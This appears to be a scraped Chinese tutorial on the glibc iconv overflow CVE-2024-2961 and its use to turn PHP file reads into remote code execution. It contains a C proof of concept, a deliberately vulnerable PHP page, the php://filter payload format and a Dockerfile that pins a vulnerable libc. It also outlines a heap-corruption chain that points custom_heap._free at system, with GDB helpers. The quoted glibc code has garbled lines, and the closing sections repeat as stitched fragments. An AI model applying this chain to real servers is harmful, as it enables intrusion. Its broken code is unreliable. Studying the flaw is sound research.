GLIBC iconv缓冲区溢出漏洞(CVE-2024-2961)分析与利用教学<\/h1>

漏洞概述<\/h2>

CVE-2024-2961是GLIBC中iconv库的一个缓冲区溢出漏洞，主要影响Linux系统。该漏洞的特殊之处在于：<\/p>

漏洞位于glibc\/iconvdata\/iso-2022-cn-ext.c文件中<\/li>
能够将PHP的任意文件读取漏洞升级为远程命令执行漏洞<\/li>

漏洞发现具有偶然性，通过fuzz PHP而非直接fuzz iconv库发现<\/li> <\/ul>

漏洞技术细节<\/h2>

漏洞代码分析<\/h3>

漏洞存在于ISO-2022-CN-EXT字符集转换处理中，关键问题代码：<\/p>

else<\/span> if<\/span> ((used &<\/span> SS2_mask) !=<\/span> 0<\/span> &&<\/span> (ann &<\/span> SS2_ann) !=<\/span> (used <<<\/span> 8<\/span>)) {
<\/span><\/span>    const<\/span> char<\/span> *<\/span>escseq;
<\/span><\/span>    assert (used ==<\/span> CNS11643_2_set); \/* XXX *\/<\/span>
<\/span><\/span>    escseq =<\/span> "*H"<\/span>;
<\/span><\/span>    *<\/span>outptr++<\/span> =<\/span> ESC;
<\/span><\/span>    *<\/span>outptr+<\/span>outptr++<\/span> =<\/span> *<\/span>escseq++<\/span>;
<\/span><\/span>    *<\/span>outptr++<\/span> =<\/span> *<\/span>escseq++<\/span>;
<\/span><\/span>    ann =<\/span> (ann &<\/span> ~<\/span>SS2_ann) |<\/span> (used <<<\/span> 8<\/span>);
<\/span><\/span>}
<\/span><\/span>else<\/span> if<\/span> ((used &<\/span> SS3_mask) !=<\/span> 0<\/span> &&<\/span> (ann &<\/span> SS3_ann) !=<\/span> (used <<<\/span> 8<\/span>)) {
<\/span><\/span>    const<\/span> char<\/span> *<\/span>escseq;
<\/span><\/span>    assert ((used >><\/span> 5<\/span>) >=<\/span> 3<\/span> &&<\/span> (used >><\/span> 5<\/span>) <=<\/span> 7<\/span>);
<\/span><\/span>    escseq =<\/span> "+I+J+K+L+M"<\/span> +<\/span> ((used >><\/span> 5<\/span>) -<\/span> 3<\/span>) *<\/span> 2<\/span>;
<\/span><\/span>    *<\/span>outptr++<\/span> =<\/span> ESC;
<\/span><\/span>    *<\/span>outptr+<\/span>outptr++<\/span> =<\/span> *<\/span>escseq++<\/span>;
<\/span><\/span>    *<\/span>outptr++<\/span> =<\/span> *<\/span>escseq++<\/span>;
<\/span><\/span>    ann =<\/span> (ann &<\/span> ~<\/span>SS3_ann) |<\/span> (used <<<\/span> 8<\/span>);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>漏洞特点：<\/p>

这两个分支会将输入转换为4字节输出<\/li>
没有检查输出缓冲区长度<\/li>
可能产生6种不同的输出格式<\/li>
<\/ol>
漏洞触发原理<\/h3>
特殊字符"劄"（UTF-8编码为\xe5\x8a\x84<\/code>）：<\/p>

输入仅占3字节<\/li>
会被转译为\x1b$*H<\/code>（4字节）<\/li>
导致1字节的缓冲区溢出<\/li>
<\/ul>
PoC分析<\/h3>
基础PoC代码：<\/p>
#include<\/span> <iconv.h><\/span>
<\/span><\/span><\/span>#include<\/span> <stdlib.h><\/span>
<\/span><\/span><\/span>#include<\/span> <stdio.h><\/span>
<\/span><\/span><\/span>#include<\/span> <string.h><\/span>
<\/span><\/span><\/span>#include<\/span> <ctype.h><\/span>
<\/span><\/span><\/span><\/span>
<\/span><\/span>void<\/span> hexdump<\/span>(void<\/span> *<\/span>ptr, int<\/span> buflen) {
<\/span><\/span>    \/\/ 省略hexdump实现
<\/span><\/span><\/span><\/span>}
<\/span><\/span>
<\/span><\/span>void<\/span> main<\/span>() {
<\/span><\/span>    iconv_t cd =<\/span> iconv_open("ISO-2022-CN-EXT"<\/span>, "UTF-8"<\/span>);
<\/span><\/span>    char<\/span> input[0x3<\/span>] =<\/span> "劄劄"<\/span>;
<\/span><\/span>    char<\/span> output[0x3<\/span>] =<\/span> {0<\/span>};
<\/span><\/span>    char<\/span> overflow[0x5<\/span>] =<\/span> "AAAA"<\/span>;
<\/span><\/span>    char<\/span> *<\/span>pinput =<\/span> input;
<\/span><\/span>    char<\/span> *<\/span>poutput =<\/span> output;
<\/span><\/span>    size_t sinput =<\/span> 3<\/span>;
<\/span><\/span>    size_t soutput =<\/span> 3<\/span>;
<\/span><\/span>    size_t status =<\/span> iconv(cd, &<\/span>pinput, &<\/span>sinput, &<\/span>poutput, &<\/span>soutput);
<\/span><\/span>    printf("Remaining bytes (should be > 0): %zd<\/span>\n<\/span>status = %d<\/span>\n<\/span>"<\/span>, soutput, status);
<\/span><\/span>    hexdump(output, 0x10<\/span>);
<\/span><\/span>    printf("overflow = %s<\/span>\n<\/span>"<\/span>, overflow);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>执行结果：<\/p>
Remaining bytes (should be > 0): -1
status = -1
000000: 1b 24 2a 48 41 41 41 00 00 13 9e 1c e1 6c 44 86 .$*HAAA......lD.
overflow = HAAA
<\/code><\/pre>
PHP环境下的漏洞利用<\/h2>
利用场景<\/h3>
将PHP的任意文件读取漏洞升级为远程命令执行漏洞：<\/p>
<?<\/span>php<\/span>
<\/span><\/span>$data =<\/span> file_get_contents<\/span>($_POST['file'<\/span>]);
<\/span><\/span>echo<\/span> "File contents: <\/span>$data<\/span>"<\/span>;
<\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>利用Payload格式：<\/p>
php:\/\/filter\/read=convert.iconv.UTF-8.ISO-2022-CN-EXT\/resource=data:text\/plain;base64,xxxxxxx
<\/code><\/pre>
环境搭建<\/h3>
Dockerfile配置：<\/p>
FROM<\/span> ubuntu:22.04<\/span>
<\/span><\/span><\/span><\/span>RUN<\/span> sed -i 's@\/\/.*archive.ubuntu.com@\/\/mirrors.ustc.edu.cn@g'<\/span> \/etc\/apt\/sources.list
<\/span><\/span><\/span><\/span>RUN<\/span> sed -i 's\/security.ubuntu.com\/mirrors.ustc.edu.cn\/g'<\/span> \/etc\/apt\/sources.list
<\/span><\/span><\/span><\/span>RUN<\/span> apt update &&<\/span> apt install -y nginx php-fpm
<\/span><\/span><\/span><\/span># 使用有漏洞的libc版本<\/span>
<\/span><\/span><\/span><\/span>RUN<\/span> apt install -y libc6-dev=<\/span>2.35-0ubuntu3 libc-dev-bin=<\/span>2.35-0ubuntu3 libc6=<\/span>2.35-0ubuntu3
<\/span><\/span><\/span><\/span>COPY<\/span> index.php \/var\/www\/html\/index.php
<\/span><\/span><\/span><\/span>COPY<\/span> nginx.conf \/etc\/nginx\/sites-enabled\/default
<\/span><\/span><\/span><\/span>COPY<\/span> start.sh \/start.sh
<\/span><\/span><\/span><\/span>RUN<\/span> chmod +x \/start.sh
<\/span><\/span><\/span><\/span>CMD<\/span> ["start.sh"<\/span>]
<\/span><\/span><\/span><\/code><\/pre>利用步骤分析<\/h3>


检测目标可利用性<\/strong><\/p>

检查是否支持data:text\/plain;base64,<\/code><\/li>
检查是否支持php:\/\/filter\/\/resource=data:text\/plain;base64,<\/code><\/li>
检查是否支持php:\/\/filter\/zlib.inflate\/resource=data:text\/plain;base64,<\/code><\/li>
<\/ul>
<\/li>

获取内存布局<\/strong><\/p>

通过\/proc\/self\/maps<\/code>获取libc基地址和PHP堆基地址<\/li>
PHP堆特征：

大小≥0x200000且为其倍数<\/li>
不属于任何二进制文件<\/li>
权限为rw-p<\/code><\/li>
<\/ul>
<\/li>
<\/ul>
<\/li>

构造Payload<\/strong><\/p>

组合使用多种filter：

zlib.inflate<\/code> - 解压缩数据<\/li>
dechunk<\/code> - 处理HTTP CHUNKED格式<\/li>
convert.iconv<\/code> - 字符编码转换<\/li>
<\/ul>
<\/li>
<\/ul>
<\/li>
<\/ol>
关键技术点<\/h3>


PHP堆管理<\/strong><\/p>

PHP使用自定义堆管理而非直接使用libc的malloc<\/li>
关键结构体_zend_mm_heap<\/code>：
struct<\/span> _zend_mm_heap {
<\/span><\/span>    \/\/ ...省略其他字段...
<\/span><\/span><\/span><\/span>    zend_mm_free_slot *<\/span>free_slot[ZEND_MM_BINS]; \/\/ 小尺寸空闲列表
<\/span><\/span><\/span><\/span>    \/\/ ...省略其他字段...
<\/span><\/span><\/span><\/span>};
<\/span><\/span><\/code><\/pre><\/li>
free_slot<\/code>类似于tcache，但缺乏安全检查<\/li>
<\/ul>
<\/li>

Filter功能分析<\/strong><\/p>

zlib.inflate<\/code>：

调用php_zlib_inflate_filter<\/code><\/li>
最大分配堆尺寸为0x8000<\/li>
<\/ul>
<\/li>
dechunk<\/code>：

处理HTTP CHUNKED格式<\/li>
可控制buflen<\/code>标志位<\/li>
<\/ul>
<\/li>
convert.quoted-printable-decode<\/code>：

解码=00<\/code>格式数据为\x00<\/code><\/li>
<\/ul>
<\/li>
convert.iconv<\/code>：

调用iconv函数进行编码转换<\/li>
<\/ul>
<\/li>
<\/ul>
<\/li>

利用链构造<\/strong><\/p>

组合使用dechunk<\/code>和convert.iconv.latin1.latin1<\/code>控制堆分配<\/li>
目标修改_zend_mm_heap->custom_heap<\/code>结构<\/li>
利用emalloc<\/code>中的自定义堆处理：
if<\/span> (UNEXPECTED(AG(mm_heap)-><\/span>use_custom_heap)) {
<\/span><\/span>    return<\/span> _malloc_custom(size ZEND_FILE_LINE_RELAY_CC ZEND_FILE_LINE_ORIG_RELAY_CC);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre><\/li>
<\/ul>
<\/li>
<\/ol>
完整利用步骤<\/h3>


控制0x100大小的堆分配与释放<\/strong><\/p>

使用dechunk<\/code>和convert.iconv.latin1.latin1<\/code>组合<\/li>
精确控制堆大小和释放时机<\/li>
<\/ul>
<\/li>

触发漏洞覆盖指针<\/strong><\/p>

构造特定堆布局<\/li>
利用iconv漏洞覆盖free_slot<\/code>指针<\/li>
<\/ul>
<\/li>

控制_zend_mm_heap<\/code>结构<\/strong><\/p>

设置use_custom_heap<\/code>为非0<\/li>
设置custom_heap._free<\/code>为system地址<\/li>
同时设置_malloc<\/code>和_realloc<\/code>函数指针<\/li>
<\/ul>
<\/li>

执行命令<\/strong><\/p>

在特定位置写入命令字符串<\/li>
建议包含kill -9 $PPID<\/code>防止意外执行<\/li>
<\/ul>
<\/li>
<\/ol>
调试技巧<\/h3>


GDB初始化配置<\/strong>：<\/p>
define php_heap
    p *(struct _zend_mm_heap *) 0x7ffff5200040
end

define pbucket
    p *(php_stream_bucket *) $arg0
end

define pbucketall
    pbucket $arg0
    set $bucket = (php_stream_bucket*) $arg0
    if $bucket->next != 0
        pbucketall $bucket->next
    end
end

dir .\/php8.1-8.1.2\/
b *(_php_stream_fill_read_buffer+309)
r poc.php
<\/code><\/pre>
<\/li>

关键断点<\/strong>：<\/p>

php_zlib_inflate_filter<\/code><\/li>
php_chunked_filter<\/code><\/li>
php_iconv_stream_filter_do_filter<\/code><\/li>
<\/ul>
<\/li>
<\/ol>
总结与防御建议<\/h2>
漏洞影响<\/h3>

影响所有使用有漏洞版本GLIBC的系统<\/li>
特别影响PHP应用，可将文件读取升级为RCE<\/li>
<\/ul>
缓解措施<\/h3>

升级GLIBC到已修复版本<\/li>
限制PHP危险函数的使用<\/li>
实施严格的输入过滤<\/li>
<\/ol>
研究方向<\/h3>

研究iconv在其他应用中的使用情况<\/li>
探索更多可能的利用场景<\/li>
<\/ul>
参考资源<\/h2>

原文链接<\/a><\/li>
PoC代码<\/a><\/li>
<\/ul>

GLIBC iconv缓冲区溢出漏洞(CVE-2024-2961)分析与利用教学<\/h1>

漏洞技术细节<\/h2>

PHP环境下的漏洞利用<\/h2>

总结与防御建议<\/h2>

研究方向<\/h3> 研究iconv在其他应用中的使用情况<\/li> 探索更多可能的利用场景<\/li> <\/ul> 参考资源<\/h2> 原文链接<\/a><\/li> PoC代码<\/a><\/li> <\/ul>

参考资源<\/h2> 原文链接<\/a><\/li> PoC代码<\/a><\/li> <\/ul>

研究方向<\/h3>

研究iconv在其他应用中的使用情况<\/li>
探索更多可能的利用场景<\/li> <\/ul>
参考资源<\/h2>

原文链接<\/a><\/li>
PoC代码<\/a><\/li> <\/ul>

参考资源<\/h2>

原文链接<\/a><\/li>
PoC代码<\/a><\/li> <\/ul>